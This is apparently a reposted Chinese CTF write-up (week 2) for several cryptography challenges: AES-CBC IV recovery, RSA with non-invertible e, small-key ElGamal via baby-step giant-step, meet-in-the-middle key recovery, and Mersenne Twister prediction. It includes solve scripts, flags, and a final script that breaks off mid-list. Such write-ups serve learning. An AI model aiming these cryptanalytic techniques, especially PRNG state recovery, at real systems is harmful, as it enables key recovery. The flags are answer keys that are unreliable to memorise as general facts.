2025?CTF(部分wp) -- week2

news/2025/10/20 9:17:47/文章来源:https://www.cnblogs.com/v1c0/p/19151778

crypto

AES_mode

题目：

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import binascii
from Crypto.Util.number import bytes_to_long
from secret import flag
import osiv = flag.strip(b'flag{').strip(b'}')key = os.urandom(16)hint = os.urandom(4) * 8
print(bytes_to_long(hint)^bytes_to_long(key))msg = b'Welcome to ?CTF! , I hope you can have fun!!!!!!'
def encrypto(message):aes = AES.new(key,AES.MODE_CBC,iv)return aes.encrypt(message)print(binascii.hexlify(encrypto(msg))[-32:])
'''
91749376808341004327450956291130629671202939702313462998246826182668975563684
b'8f325d5b5c5454680628fa08746d67cf'
'''

从 x 得到 key，用 AES-ECB 解密 C3 得到 D_k(C3)，然后 C2 = D_k(C3) ⊕ P3，解密 C2 得到 D_k(C2)，然后 C1 = D_k(C2) ⊕ P2，解密 C1 得到 D_k(C1)，然后 IV = D_k(C1) ⊕ P1，IV 就是 flag 。

from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes, bytes_to_long
import binasciix = 91749376808341004327450956291130629671202939702313462998246826182668975563684
last_block_hex = '8f325d5b5c5454680628fa08746d67cf'
last_block = binascii.unhexlify(last_block_hex)x_bytes = x.to_bytes(32, 'big')
high = x_bytes[:16]
low = x_bytes[16:]
key = long_to_bytes(bytes_to_long(high) ^ bytes_to_long(low))msg = b'Welcome to ?CTF! , I hope you can have fun!!!!!!'
msg_padded = msg + b'\x01'
P1 = msg_padded[0:16]
P2 = msg_padded[16:32]
P3 = msg_padded[32:48]cipher = AES.new(key, AES.MODE_ECB)C3 = last_blockD_C3 = cipher.decrypt(C3)
C2 = bytes(a ^ b for a, b in zip(D_C3, P3))D_C2 = cipher.decrypt(C2)
C1 = bytes(a ^ b for a, b in zip(D_C2, P2))D_C1 = cipher.decrypt(C1)
IV = bytes(a ^ b for a, b in zip(D_C1, P1))flag = b'flag{' + IV + b'}'
print( flag)"""
b'flag{CBc_Us3s_Iv!=ECb}'
"""

Common RSA

题目：

from Crypto.Util.number import *
from secret import flagassert flag.startswith(b'flag{') and flag.endswith(b'}')p, q = getPrime(512), getPrime(512)
n = p * q
e = 65537
m = bytes_to_long(flag)
c = pow(m, e, n)hint = pow(p + q, 2, n)print(f'{n = }')
print(f'{e = }')
print(f'{c = }')
print(f'{hint = }')'''
n = 131597024257614620869648421307952022599943625170798058722475560465555374754170467986433278540604131619940641178519954230167502146438244308999511105433219427638803460889093328223802388178143540560813587991639442439109510325931982801296494725966519902673302205827914999084293810023067168509012158443748031939483
e = 65537
c = 1968659140793648429069472000786965200510587960406184785982668854732724642287423003255222009970017202179772168410459767605874195614574533370563277818681668876342943583147204497260995173839443989636764614809399895977498001560095317260220383552929292480197409615426208803132661827666690467265686165715909909838
hint = 8041845809205494984282719083536906169105876887210623661715566866580197885950852556859414098121226785749033039450259965513505083753685569890927709072642971188655408152663342066047346862975209503093968807589977151718256296935551857116746970823854584764670720138775077146982697233376686489502015164620786724
'''

n可以在https://factordb.com/进行分解

p = 11516500417019426723367143367023721121114237031914370279724222540748204265234478123246834079895657926608151549574717796604640363281423933511518846958827933
q = 11426824077836755495280357054790333684863938044257704528662235024002507215836880134548286374738252595545758498922210216905258406873430274217501038930995351

这道题正常RSA解密会出现报错

Traceback (most recent call last):d = gmpy2.invert(e,phi)
ZeroDivisionError: invert() no inverse exists

这里的情况是
gcd⁡(e,p−1)=gcd⁡(e,q−1)=e，也就是说模 p 有 e 个解，模 q 也有 e 个解，总解数为 e²

分别列出模 p 与模 q 的所有 e 次根（每边 e 个，但枚举 65537 次很快），然后筛选那些数值上很小的代表（因为 flag 明文转成整数通常很小，远小于 p,q）。两边如果出现相同的小整数代表，那就是明文了

exp:

from Crypto.Util.number import inverse, long_to_bytes
import random
from math import gcdn = 131597024257614620869648421307952022599943625170798058722475560465555374754170467986433278540604131619940641178519954230167502146438244308999511105433219427638803460889093328223802388178143540560813587991639442439109510325931982801296494725966519902673302205827914999084293810023067168509012158443748031939483
e = 65537
c = 1968659140793648429069472000786965200510587960406184785982668854732724642287423003255222009970017202179772168410459767605874195614574533370563277818681668876342943583147204497260995173839443989636764614809399895977498001560095317260220383552929292480197409615426208803132661827666690467265686165715909909838p = 11516500417019426723367143367023721121114237031914370279724222540748204265234478123246834079895657926608151549574717796604640363281423933511518846958827933
q = 11426824077836755495280357054790333684863938044257704528662235024002507215836880134548286374738252595545758498922210216905258406873430274217501038930995351def find_h(mod, t, e, trials=2000):for _ in range(trials):g = random.randrange(2, mod-1)h = pow(g, t, mod)if h != 1 and pow(h, e, mod) == 1:return hreturn pow(2, t, mod)t_p = (p-1)//e
t_q = (q-1)//e
u_p = inverse(e, t_p)
u_q = inverse(e, t_q)x_p = pow(c % p, u_p, p)
x_q = pow(c % q, u_q, q)h_p = find_h(p, t_p, e)
h_q = find_h(q, t_q, e)bound = 1 << 400small_p = {}
for i in range(e):v = (x_p * pow(h_p, i, p)) % pif v < bound:small_p[v] = ismall_q = {}
for i in range(e):v = (x_q * pow(h_q, i, q)) % qif v < bound:small_q[v] = icommon = set(small_p.keys()) & set(small_q.keys())for m_int in common:print(long_to_bytes(m_int))"""
b'flag{1t_i5_N0T_4_c0mmOn_R5A!}'
"""

baby Elgamal

题目：

from Crypto.Util.number import *
import random
from secret import flagp = getPrime(512)
g = random.randint(2, p - 2)
x = random.getrandbits(32)
y = pow(g, x, p)print(f'{p = }')
print(f'{g = }')
print(f'{y = }')k = random.randint(2, p - 2)
m = bytes_to_long(flag)
c1 = pow(g, k, p)
c2 = m ^ pow(y, k, p)print(f'{c1 = }')
print(f'{c2 = }')'''
p = 10560464175631160709999383504944939280267067560378620626979040921315467798501630079655340663547895515812021911470304483075907600549587171358369476255124337
g = 5572911063894340974483734192541353411838868965361107134612465011908061780180242348779533324820127053271574799429894984956163372524626786431177292215721384
y = 2551976503972625362405323290468587787679347326045114894085518452627208422960190509410833573983206966744456211220857302778318665690771595372276106771043208
c1 = 1205617983130100879228661072981675725569095797251301660744333997969095366993470887762473783053252549837619991656838026541987751368433948599410216526314464
c2 = 135410793997875487972298785237681131478761447205213610635842285010164308038301697054176371628605014267489864238137735560888444688177201474949707954751577
'''

私钥 x 只用 getrandbits(32)，可用有上界的 BSGS 在 2322^{32}2³²范围内能秒解离散对数；有了 xx就能算出会话密钥 s=y^k=(g^k)^x=c1^xmod p,而题目又用 c2 = m ^ s（按位异或），直接还原明文。

from math import ceil, sqrt
from Crypto.Util.number import long_to_bytesp = 10560464175631160709999383504944939280267067560378620626979040921315467798501630079655340663547895515812021911470304483075907600549587171358369476255124337
g = 5572911063894340974483734192541353411838868965361107134612465011908061780180242348779533324820127053271574799429894984956163372524626786431177292215721384
y = 2551976503972625362405323290468587787679347326045114894085518452627208422960190509410833573983206966744456211220857302778318665690771595372276106771043208
c1 = 1205617983130100879228661072981675725569095797251301660744333997969095366993470887762473783053252549837619991656838026541987751368433948599410216526314464
c2 = 135410793997875487972298785237681131478761447205213610635842285010164308038301697054176371628605014267489864238137735560888444688177201474949707954751577def bsgs_bound(g, y, p, N=2**32):m = ceil(sqrt(N))table = {}e = 1for j in range(m):if e not in table:table[e] = je = (e * g) % pinv_g = pow(g, p-2, p)factor = pow(inv_g, m, p)gamma = yfor i in range(m + 1):if gamma in table:x = i * m + table[gamma]if x < N:return xgamma = (gamma * factor) % preturn Nonex = bsgs_bound(g % p, y % p, p)
assert x is not None and pow(g, x, p) == y
print("x =", x)s = pow(c1, x, p)
m = c2 ^ s
flag = long_to_bytes(m).decode('utf-8', 'ignore')
print( flag)"""
x = 1616680587
flag{31g4m41_D15cr373_10g}
"""

findKey in middle

题目：

from Crypto.Util.Padding import pad
from Crypto.Util.number import *
from random import getrandbits
from Crypto.Cipher import AES
from hashlib import sha256
from secret import flagdef f(x, y):return (pow(3, x, p) * pow(5, y, p)) % pdef split_key(key):x, y = getPrime(16), getPrime(16)assert x * y > keyk1, k2 = key % x, key % yreturn k1, k2, x, ydef aes_encrypt(key, flag):aes = AES.new(key, AES.MODE_ECB)return aes.encrypt(pad(flag, 16))   p = 1000000007key = getrandbits(32)
k1, k2, mod1, mod2 = split_key(key)
x = f(k1, k2)cipher = aes_encrypt(sha256(long_to_bytes(key)).digest()[:16], flag)print(f'x = {x}')
print(f'mod = {(mod1, mod2)}')
print(f'cipher = {cipher}')
# x = 367608838
# mod = (41813, 53149)
# cipher = b'\x98\xfd\xa8\x05R\x17\xb6y%"\t\xb4\xd7\x82\xc4\'\x0b8\x14q\xff.\x13\xfb\xa4D\xb4\xde-\xd5c\xd6M\x13\x90\xdb\x81\xbd\xd0c>A\xbc)\xd0U\x7fW'

题目把一个 32 位的 key 拿来“拆分”为两个模 x, y 的余数：
- k1 = key mod x
- k2 = key mod y
同时定义了 f(k1, k2) = 3^k1 * 5^k2 (mod p) 并把结果赋给 x（注意这里的 x 是 f(k1,k2) 的值，与模数 mod1、mod2 不同）。
给出的 mod1, mod2 实际上就是 x, y（16 位素数），因此 k1 ∈ [0, mod1-1], k2 ∈ [0, mod2-1] 的范围非常小。
攻击思路是“两路求和”/“打表对撞”（meet-in-the-middle）：
- 构造表：对所有 k1 在 [0, mod1-1]，计算 s = 3^k1 (mod p)，把 s 映射到 k1。
- 遍历 k2 在 [0, mod2-1]，计算 t = x * inv(5^k2) (mod p)。如果 t 出现在表中，则得到 k1, k2 满足 3^k1 * 5^k2 ≡ x (mod p)。
一旦得到 k1, k2，就可以用 CRT 把 key 还原出来：
- key ≡ k1 (mod mod1)
- key ≡ k2 (mod mod2)
- 由于 mod1, mod2 是互质的，唯一解在 0 ≤ key < mod1*mod2。
该 key 作为 AES 的原始密钥计算方式是 sha256(long_to_bytes(key)).digest()[:16]，再用 AES-ECB 对 flag 进行解密并去填充，得到原始 flag。

exp:

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Util.number import long_to_bytes
from hashlib import sha256def crt_from_residues(a1, m1, a2, m2):M = m1 * m2t = ((a2 - a1) % m2) * pow(m1 % m2, -1, m2) % m2x = a1 + m1 * treturn x % Mdef solve_flag_from_values(x_value, mod1, mod2, cipher_bytes):p = 1000000007pow3_map = {}cur = 1for k1 in range(mod1):if cur not in pow3_map:pow3_map[cur] = k1cur = (cur * 3) % pinv5 = pow(5, p - 2, p)inv5pow = 1for k2 in range(mod2):target = (x_value * inv5pow) % pif target in pow3_map:k1 = pow3_map[target]key = crt_from_residues(k1, mod1, k2, mod2)key_bytes = long_to_bytes(key)aes_key = sha256(key_bytes).digest()[:16]cipher = AES.new(aes_key, AES.MODE_ECB)pt_padded = cipher.decrypt(cipher_bytes)flag = unpad(pt_padded, 16)#print(key)#1313232941print(flag.decode('utf-8', errors='ignore'))returninv5pow = (inv5pow * inv5) % praise SystemExit("Failed to recover k1,k2 with given inputs.")if __name__ == "__main__":# Replace these values with the actual ones printed by the challenge# Example from the prompt:x_value = 367608838mod1 = 41813mod2 = 53149cipher_bytes = b'\x98\xfd\xa8\x05R\x17\xb6y%"\t\xb4\xd7\x82\xc4\'\x0b8\x14q\xff.\x13\xfb\xa4D\xb4\xde-\xd5c\xd6M\x13\x90\xdb\x81\xbd\xd0c>A\xbc)\xd0U\x7fW'solve_flag_from_values(x_value, mod1, mod2, cipher_bytes)"""
flag{e31343dd-4795-4236-bbec-11b8410b5ce6}
"""

strange random

题目：

from Crypto.Util.number import *
import random
from sympy import prime
def sssstranger(p,q):n = p*qlist=[]for i in range(312):x=random.getrandbits(32)list.append(x)print(list)return np=getStrongPrime(512)
q=getStrongPrime(512)
r=getStrongPrime(512)
n1=sssstranger(p,q)
print(n1)
n2=sssstranger(q,r)
print(n2)
e=random.getrandbits(32)
m=bytes_to_long(b"xxx")
c=pow(m,e,n1*n2//q)
print(c)
'''
[1728665541, 3263255435, 2691063119, 513420434, 1978667458, 2092691241, 3072561387, 378231450, 3028786976, 840997868, 3471062203, 3920316636, 3916637804, 2376627024, 3173388560, 3539723936, 3614347224, 1379925726, 627801586, 2033110031, 3011670978, 2445060030, 3597825709, 1550315482, 3554680797, 536809681, 2468123914, 2237079688, 2296929082, 509016983, 1311981805, 587441307, 1250231566, 1315700906, 776365185, 2859464782, 3355190319, 1918102563, 211231701, 845506441, 3178972471, 3192228027, 1529640612, 1191656594, 484407364, 2429115020, 1919153985, 4078408440, 202834614, 3117949094, 3476209197, 4079805955, 111463567, 3658322943, 1016273317, 807556240, 3367455806, 2847052298, 2082435398, 1180401345, 3299362819, 4184474116, 2494750167, 4096990231, 1612750035, 770130274, 1733434788, 3092462951, 172910303, 2670474919, 362297276, 2782760415, 2884584980, 2326865163, 720680806, 1281073207, 950149740, 2778388627, 3101343550, 2770433242, 2788026555, 1262935285, 3581320389, 4194538979, 696994625, 821111473, 2806414521, 777650820, 3663930324, 4178227152, 606200040, 2069454582, 2173681644, 2922086151, 2020623409, 3758719473, 1312449069, 2927391874, 4270320113, 3753066345, 1995980698, 4258470255, 1327644070, 3351177965, 298217788, 2620469257, 2989578615, 4055438139, 3942865412, 1622171985, 4273198698, 1243493635, 1396590445, 2402566178, 4029896237, 1025694233, 2314450406, 4170179809, 4024445981, 1994273208, 1861210759, 1803769206, 3689618816, 2927243579, 1922806785, 2486390395, 1862533438, 1121029203, 2031745224, 3841331572, 3769538458, 842401540, 2163702504, 831385340, 376394126, 3974915965, 4034996030, 1854785567, 2555092021, 3046897262, 1094027606, 907771043, 384404822, 3501497369, 216697168, 226807575, 2747644288, 1972752441, 3105815096, 828173042, 3678659380, 764441556, 1130297460, 1402863762, 3970725436, 3086776368, 344855794, 2088029785, 503832722, 1968203466, 279790788, 3883395066, 4037131559, 1964635994, 1743508595, 3532171326, 1818297125, 2848875183, 1136249744, 4272443113, 1788562924, 3711074145, 418022453, 4283864580, 1386827219, 2059781647, 449497651, 469589888, 3588436437, 351986216, 3443966898, 2319253729, 1266070779, 1630403341, 1846437281, 3603091148, 447407528, 1442665148, 928268668, 2054879461, 774139131, 2430644896, 3555838468, 2030660868, 3319238578, 1015731571, 3478144019, 2453174776, 1941944791, 2053565326, 4110536281, 2526460393, 2824479032, 3301735760, 780255490, 1603208589, 1692469907, 3130130497, 3584634807, 3928107012, 509990258, 1869589899, 1905903514, 2952291895, 1729434633, 2044093816, 970234210, 1567208463, 2796641501, 1745350460, 3822138868, 2103785872, 391350339, 4191592334, 137687673, 4006137512, 1593615631, 1861899739, 3651189911, 520633354, 1966539346, 169641067, 1406362177, 737946704, 784276247, 2058995198, 3549499398, 1558398384, 3675852813, 1429069728, 2298431975, 2898233687, 286239555, 392193984, 3086032521, 3126507866, 34675686, 2287440422, 2548373557, 836659862, 99648826, 1083241258, 3636664381, 3251127672, 3516486155, 3869736806, 3646281836, 1700118982, 2156956, 1800018184, 777416396, 322014799, 3243611333, 1128026911, 4092136383, 2745524281, 751830889, 4158398986, 2017168515, 4209181862, 1454303529, 4210187982, 2987136052, 118405085, 2154307567, 2706958148, 783722604, 3630718307, 2946126077, 3769533841, 1952446395, 2864470266, 2438635144, 109801110, 2106815318, 1964646247, 2230611498, 3926379899, 2415862583, 2403244187, 1558995124, 755524922, 3392617372, 3025516874, 4190475123, 2949921629, 501571073, 4156590328, 4269504697, 2949638988, 1468559288, 3213839184, 2489556309, 3740310282, 2197691296, 2398027688, 3828617697, 1569783402, 2795666101, 176638489, 2911249476, 4241926468]
138851415190713465480971174257448869324235475491224608863667367765557787130928841140544464901159451427142751973587286540048280289357977393428301017662916668537581389547284678037051116847831257571725930334961572331109949981542324563168168819931774176415705884732805196594752559820155791993081799451192512108559
[942815517, 2520455710, 1891728341, 2453497085, 3941880462, 2392891255, 2747143494, 4243618507, 1517358347, 450211540, 2842693883, 1221103042, 1422891239, 4030144964, 2685521942, 1947290728, 3302832218, 1782499203, 3868364088, 308582506, 4251094005, 4980868, 2451326086, 3651628499, 2281074832, 480798516, 758959082, 3615264118, 1219594762, 1098658489, 2470901076, 1893356372, 3318772649, 1863044573, 3548017752, 3763808736, 1654584736, 3003555639, 1256437939, 3270885177, 258743642, 1299719645, 2208182535, 373707415, 1911873380, 92306350, 1545073247, 3827312104, 3255398601, 3192552708, 3206214673, 420879235, 1364502459, 3758282150, 2525185637, 1668948490, 1540972099, 4226808177, 2383393173, 3749471576, 1454575032, 3539841865, 690099204, 3429693556, 3143045768, 1019783847, 4254140560, 3362875271, 4286952044, 3651977835, 3979297548, 3354687702, 732498631, 830001339, 1600709940, 256242259, 3433896402, 717208932, 1143942721, 1387817800, 4149665963, 4136218742, 1148960729, 3448152230, 88647458, 1774354757, 3157382396, 2749420283, 3384884111, 4052749938, 3562466643, 388123649, 1019572873, 9288731, 2722126277, 2203755362, 2808094116, 318555465, 4238001430, 1279580330, 2688604848, 1360319839, 2479873580, 1061154987, 2958583972, 479553026, 1527664208, 1632893535, 3787166229, 989207338, 1663447933, 3712938090, 4198966560, 2566654848, 3696114905, 3012771350, 3607688877, 913491574, 3931397722, 3009342175, 2443448349, 1062996946, 2981037281, 26940862, 949228546, 4200949390, 4183590581, 1149500333, 2868274151, 1076013183, 2931224950, 1231187554, 1432454474, 462283109, 2459428825, 2313869884, 3779120205, 671163379, 283074107, 4292451272, 2073686644, 2106538278, 795977087, 1521261558, 2211934761, 3442006668, 810921154, 657699377, 2190946289, 3774455606, 95125385, 2480329023, 3476089304, 1238475919, 1076726394, 2120212816, 912904401, 3115487553, 4166801889, 2671842223, 3233061625, 2792720396, 164231023, 2899715615, 1080603752, 1871958768, 3205958631, 1429172605, 102859110, 1233358091, 4121045015, 3707468958, 2054107845, 3086180315, 3618494768, 151289595, 2395511379, 2202211183, 3317167416, 924499924, 1123843927, 1845597735, 2551305188, 281765988, 2688253086, 1560780497, 2061169891, 573571184, 2525386268, 1825854571, 2899785981, 3266712321, 3610412586, 411137454, 3935324159, 2494782798, 3373400635, 909758036, 730762387, 821217945, 1637755246, 914390627, 364271532, 3570237156, 739531656, 3535813993, 3136577043, 269001524, 330161113, 1582587768, 4276579985, 650173619, 2350573855, 1233199180, 824190362, 2132064523, 1630599868, 3890164143, 3281849000, 443369842, 556256551, 3665988107, 168059217, 2459533678, 2959581748, 1266795043, 2541445057, 3690162432, 4033239960, 2747349823, 2527544983, 3483114688, 1912665005, 2589639629, 967006093, 3043481320, 1577789923, 888032317, 3135015646, 1807362947, 3974720459, 1028251582, 1395973950, 141248013, 3415448254, 2585771855, 1652904856, 2483847688, 1241390535, 2966558718, 80133169, 544591052, 117065220, 1259833545, 4287364552, 3172964645, 1378147180, 1961149024, 2557044426, 3079500155, 1278712539, 2437075468, 4079403208, 1424357113, 1460980393, 1869711134, 739995379, 236457792, 56725573, 1192143182, 3480051881, 1940191085, 2145576244, 277256288, 1350391298, 927908951, 234611527, 1270659504, 2800736156, 2377033778, 379042674, 268642839, 254414386, 3717739293, 3742427571, 2062173352, 1468838866, 3248800238, 3810334297, 1774562996, 3243508531, 768385892, 3663776790, 3561471474, 2072506584, 4072612194, 4145385651, 1568151342, 413061947, 2606711318, 787242867, 358259431, 3250866366, 496471679, 3974003161, 3962245443, 3448346690, 3918858426, 1545049592, 4098252582, 4272944055, 2709981394]
114667370859267713459979739172691665204879151133165169917752071845350748196947769536460950730177555853607685665148468694999487984430241339705779225600425842398781387739352517522092529671186262329583850232443458354943390042125768975735770226662059908491110663467968924345474794260851510527271024718213859872091
254437839234710932548963084800696912447199841209292016504026652383142017227876963989808065988983617626350151358444895183944611290313513729505521630711812174923796964838915751672967332321515720258149777206328112312514688748335753179198631177743199829645308091442800427146012476434191025450662950787631144984158609948536064605299987908223963902731920237033619141863042816600729594847568654431928343565350409273886054122366132475796004834811862120850908513978375240
'''

先把指数 e 拆成「与p−1互素的部分」和「只含p−1中素因子的部分」：
e=e_coprime⋅e_in，其中 e_coprime不含任何整除 p−1的素因子。
先把密文降幂：y≡(1 / c^e)coprime^mod(p−1)≡m^(e)in(modp)
然后只对 e_in做开根：
对2的幂：Tonelli–Shanks 连续开平方（开多少次就按 e 里 2 的指数来开，不需要看 p−1的 2 阶）。
对奇素数：做一次“ℓ-次根”：令 u_ℓ≡ℓ⁻¹(mod(p−1)/ℓ)，取 y^（u）ℓ即得一支根。
合并到三素数再用 CRT；最后枚举核 ∣ker⁡(x↦x^e)∣=gcd⁡(e,p−1)⋅gcd⁡(e,q−1)⋅gcd⁡(e,r−1)

exp:

from math import gcd
import randomdef long_to_bytes(n: int) -> bytes:if n == 0: return b"\x00"return n.to_bytes((n.bit_length()+7)//8, 'big')def v_p(n, p):t = 0while n % p == 0:n //= p; t += 1return tdef legendre(a, p): return pow(a, (p-1)//2, p)def tonelli(n, p):if n % p == 0: return 0, 0if p % 4 == 3:r = pow(n, (p+1)//4, p); return r, (-r) % pq = p - 1; s = 0while q % 2 == 0: q //= 2; s += 1z = 2while legendre(z, p) != p-1: z += 1c = pow(z, q, p); t = pow(n, q, p); r = pow(n, (q+1)//2, p)while t % p != 1:i = 1; t2 = pow(t, 2, p)while t2 % p != 1: t2 = pow(t2, 2, p); i += 1b = pow(c, 1 << (s - i - 1), p)s = i; c = pow(b, 2, p); t = (t * c) % p; r = (r * b) % preturn r, (-r) % pdef crt_pair(a1, m1, a2, m2):g = gcd(m1, m2)t = ((a2 - a1)//g) * pow(m1//g, -1, m2//g) % (m2//g)x = a1 + t*m1return x % (m1*(m2//g)), m1*(m2//g)def crt_all(res, mods):x, m = res[0], mods[0]for a, mod in zip(res[1:], mods[1:]):x, m = crt_pair(x, m, a, mod)return x % m, mdef factors_small(n):f = {}d = 2x = nwhile d*d <= x:while x % d == 0:f[d] = f.get(d, 0) + 1; x //= dd += 1 if d == 2 else 2if x > 1: f[x] = f.get(x, 0) + 1return fdef generator_of_exact_order(p, d):if d == 1: return 1primes = list(factors_small(d).keys())for _ in range(800):a = random.randrange(2, p-1)g = pow(a, (p-1)//d, p)if g == 1: continueif all(pow(g, d//t, p) != 1 for t in primes): return graise RuntimeError("找核生成元失败，重跑即可")N, M = 624, 397
MATRIX_A = 0x9908B0DF; UPPER_MASK = 0x80000000; LOWER_MASK = 0x7fffffff
def _urx(y,s): x=0;def _urx(y, s):x = 0for _ in range(5): x = y ^ (x >> s)return x & 0xffffffff
def _ulxa(y, s, m):x = 0for _ in range(5): x = y ^ ((x << s) & m)return x & 0xffffffff
def untemper(y):y = _urx(y, 18)y = _ulxa(y, 15, 0xEFC60000)y = _ulxa(y, 7,  0x9D2C5680)y = _urx(y, 11)return y & 0xffffffff
def temper(x):x ^= (x >> 11); x ^= (x << 7) & 0x9D2C5680x ^= (x << 15) & 0xEFC60000; x ^= (x >> 18)return x & 0xffffffff
def twist(state):for i in range(N):x = (state[i] & UPPER_MASK) | (state[(i+1)%N] & LOWER_MASK)xA = x >> 1if x & 1: xA ^= MATRIX_Astate[i] = state[(i + M) % N] ^ xAreturn state
def predict_next_32bit(outputs_624):state = [untemper(y) for y in outputs_624]state2 = twist(state[:])return temper(state2[0])LIST1 = [1728665541, 3263255435, 2691063119, 513420434, 1978667458, 2092691241, 3072561387, 378231450, 3028786976, 840997868, 3471062203, 3920316636, 3916637804, 2376627024, 3173388560, 3539723936, 3614347224, 1379925726, 627801586, 2033110031, 3011670978, 2445060030, 3597825709, 1550315482, 3554680797, 536809681, 2468123914, 2237079688, 2296929082, 509016983, 1311981805, 587441307, 1250231566, 1315700906, 776365185, 2859464782, 3355190319, 1918102563, 211231701, 845506441, 3178972471, 3192228027, 1529640612, 1191656594, 484407364, 2429115020, 1919153985, 4078408440, 202834614, 3117949094, 3476209197, 4079805955, 111463567, 3658322943, 1016273317, 807556240, 3367455806, 2847052298, 2082435398, 1180401345, 3299362819, 4184474116, 2494750167, 4096990231, 1612750035, 770130274, 1733434788, 3092462951, 172910303, 2670474919, 362297276, 2782760415, 2884584980, 2326865163, 720680806, 1281073207, 950149740, 2778388627, 3101343550, 2770433242, 2788026555, 1262935285, 3581320389, 4194538979, 696994625, 821111473, 2806414521, 777650820, 3663930324, 4178227152, 606200040, 2069454582, 2173681644, 2922086151, 2020623409, 3758719473, 1312449069, 2927391874, 4270320113, 3753066345, 1995980698, 4258470255, 1327644070, 3351177965, 298217788, 2620469257, 2989578615, 4055438139, 3942865412, 1622171985, 4273198698, 1243493635, 1396590445, 2402566178, 4029896237, 1025694233, 2314450406, 4170179809, 4024445981, 1994273208, 1861210759, 1803769206, 3689618816, 2927243579, 1922806785, 2486390395, 1862533438, 1121029203, 2031745224, 3841331572, 3769538458, 842401540, 2163702504, 831385340, 376394126, 3974915965, 4034996030, 1854785567, 2555092021, 3046897262, 1094027606, 907771043, 384404822, 3501497369, 216697168, 226807575, 2747644288, 1972752441, 3105815096, 828173042, 3678659380, 764441556, 1130297460, 1402863762, 3970725436, 3086776368, 344855794, 2088029785, 503832722, 1968203466, 279790788, 3883395066, 4037131559, 1964635994, 1743508595, 3532171326, 1818297125, 2848875183, 1136249744, 4272443113, 1788562924, 3711074145, 418022453, 4283864580, 1386827219, 2059781647, 449497651, 469589888, 3588436437, 351986216, 3443966898, 2319253729, 1266070779, 1630403341, 1846437281, 3603091148, 447407528, 1442665148, 928268668, 2054879461, 774139131, 2430644896, 3555838468, 2030660868, 3319238578, 1015731571, 3478144019, 2453174776, 1941944791, 2053565326, 4110536281, 2526460393, 2824479032, 3301735760, 780255490, 1603208589, 1692469907, 3130130497, 3584634807, 3928107012, 509990258, 1869589899, 1905903514, 2952291895, 1729434633, 2044093816, 970234210, 1567208463, 2796641501, 1745350460, 3822138868, 2103785872, 391350339, 4191592334, 137687673, 4006137512, 1593615631, 1861899739, 3651189911, 520633354, 1966539346, 169641067, 1406362177, 737946704, 784276247, 2058995198, 3549499398, 1558398384, 3675852813, 1429069728, 2298431975, 2898233687, 286239555, 392193984, 3086032521, 3126507866, 34675686, 2287440422, 2548373557, 836659862, 99648826, 1083241258, 3636664381, 3251127672, 3516486155, 3869736806, 3646281836, 1700118982, 2156956, 1800018184, 777416396, 322014799, 3243611333, 1128026911, 4092136383, 2745524281, 751830889, 4158398986, 2017168515, 4209181862, 1454303529, 4210187982, 2987136052, 118405085, 2154307567, 2706958148, 783722604, 3630718307, 2946126077, 3769533841, 1952446395, 2864470266, 2438635144, 109801110, 2106815318, 1964646247, 2230611498, 3926379899, 2415862583, 2403244187, 1558995124, 755524922, 3392617372, 3025516874, 4190475123, 2949921629, 501571073, 4156590328, 4269504697, 2949638988, 1468559288, 3213839184, 2489556309, 3740310282, 2197691296, 2398027688, 3828617697, 1569783402, 2795666101, 176638489, 2911249476, 4241926468]
n1 = 138851415190713465480971174257448869324235475491224608863667367765557787130928841140544464901159451427142751973587286540048280289357977393428301017662916668537581389547284678037051116847831257571725930334961572331109949981542324563168168819931774176415705884732805196594752559820155791993081799451192512108559
LIST2 = [942815517, 2520455710, 1891728341, 2453497085, 3941880462, 2392891255, 2747143494, 4243618507, 1517358347, 450211540, 2842693883, 1221103042, 1422891239, 4030144964, 2685521942, 1947290728, 3302832218, 1782499203, 3868364088, 308582506, 4251094005, 4980868, 2451326086, 3651628499, 2281074832, 480798516, 758959082, 3615264118, 1219594762, 1098658489, 2470901076, 1893356372, 3318772649, 1863044573, 3548017752, 3763808736, 1654584736, 3003555639, 1256437939, 3270885177, 258743642, 1299719645, 2208182535, 373707415, 1911873380, 92306350, 1545073247, 3827312104, 3255398601, 3192552708, 3206214673, 420879235, 1364502459, 3758282150, 2525185637, 1668948490, 1540972099, 4226808177, 2383393173, 3749471576, 1454575032, 3539841865, 690099204, 3429693556, 3143045768, 1019783847, 4254140560, 3362875271, 4286952044, 3651977835, 3979297548, 3354687702, 732498631, 830001339, 1600709940, 256242259, 3433896402, 717208932, 1143942721, 1387817800, 4149665963, 4136218742, 1148960729, 3448152230, 88647458, 1774354757, 3157382396, 2749420283, 3384884111, 4052749938, 3562466643, 388123649, 1019572873, 9288731, 2722126277, 2203755362, 2808094116, 318555465, 4238001430, 1279580330, 2688604848, 1360319839, 2479873580, 1061154987, 2958583972, 479553026, 1527664208, 1632893535, 3787166229, 989207338, 1663447933, 3712938090, 4198966560, 2566654848, 3696114905, 3012771350, 3607688877, 913491574, 3931397722, 3009342175, 2443448349, 1062996946, 2981037281, 26940862, 949228546, 4200949390, 4183590581, 1149500333, 2868274151, 1076013183, 2931224950, 1231187554, 1432454474, 462283109, 2459428825, 2313869884, 3779120205, 671163379, 283074107, 4292451272, 2073686644, 2106538278, 795977087, 1521261558, 2211934761, 3442006668, 810921154, 657699377, 2190946289, 3774455606, 95125385, 2480329023, 3476089304, 1238475919, 1076726394, 2120212816, 912904401, 3115487553, 4166801889, 2671842223, 3233061625, 2792720396, 164231023, 2899715615, 1080603752, 1871958768, 3205958631, 1429172605, 102859110, 1233358091, 4121045015, 3707468958, 2054107845, 3086180315, 3618494768, 151289595, 2395511379, 2202211183, 3317167416, 924499924, 1123843927, 1845597735, 2551305188, 281765988, 2688253086, 1560780497, 2061169891, 573571184, 2525386268, 1825854571, 2899785981, 3266712321, 3610412586, 411137454, 3935324159, 2494782798, 3373400635, 909758036, 730762387, 821217945, 1637755246, 914390627, 364271532, 3570237156, 739531656, 3535813993, 3136577043, 269001524, 330161113, 1582587768, 4276579985, 650173619, 2350573855, 1233199180, 824190362, 2132064523, 1630599868, 3890164143, 3281849000, 443369842, 556256551, 3665988107, 168059217, 2459533678, 2959581748, 1266795043, 2541445057, 3690162432, 4033239960, 2747349823, 2527544983, 3483114688, 1912665005, 2589639629, 967006093, 3043481320, 1577789923, 888032317, 3135015646, 1807362947, 3974720459, 1028251582, 1395973950, 141248013, 3415448254, 2585771855, 1652904856, 2483847688, 1241390535, 2966558718, 80133169, 544591052, 117065220, 1259833545, 4287364552, 3172964645, 